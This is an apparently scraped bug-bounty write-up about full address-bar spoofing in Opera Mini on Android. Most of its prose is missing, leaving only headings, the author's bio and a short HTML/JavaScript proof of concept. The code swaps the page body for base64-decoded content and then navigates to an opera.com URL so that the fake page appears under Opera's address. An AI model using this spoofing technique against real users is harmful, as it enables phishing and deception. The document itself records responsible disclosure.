Full Address Bar Spoofing On Opera Mini Android

Patience is indeed* a virtue — bug bounty

Summary

Impact

Expected behavior

Reproducibility

The Great Plot

Opera Software asking POC
<html>
<title>Not Opera</title>
<body>
<script>
function spoof()
{
var data = 'PGh0bWw+PGJvZHk+PGgxIGFsaWduPSJjZW50ZXIiPlRoaXMgaXMgZGVmaW5pdGVseSBub3QgT3BlcmEuPC9oMT48L2JvZHk+PC9odG1sPg=='; // base64 encoded html content
document.body.innerHTML=atob(data);
window.location.assign("https://www.opera.com:8080");
}
setInterval(spoof(),100000);
</script>
</script>
</body>
</html>

Validation or say, “Oh my god, I really found a valid bug, I can’t believe it!” moment

The bug was found valid, …ob..viously?!

The “arm-twisting”

Hello there? Anyone?

I ❤ Opera‘s Responsiveness

Translation: OMG! I am a genius!

Finally! The bug fix moment

Aftermaths & The End

The Hall of Fame

Opera Security Hall of Fame (HoF)

--

--

Google Code-In C. Winner. GsOCer ‘19. Independent Security Researcher. Have hacked Medium, Mozilla, Opera & many more. Personal Website: https://0x48piraj.com

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Piyush Raj ~ Rex

Google Code-In C. Winner. GsOCer ‘19. Independent Security Researcher. Have hacked Medium, Mozilla, Opera & many more. Personal Website: https://0x48piraj.com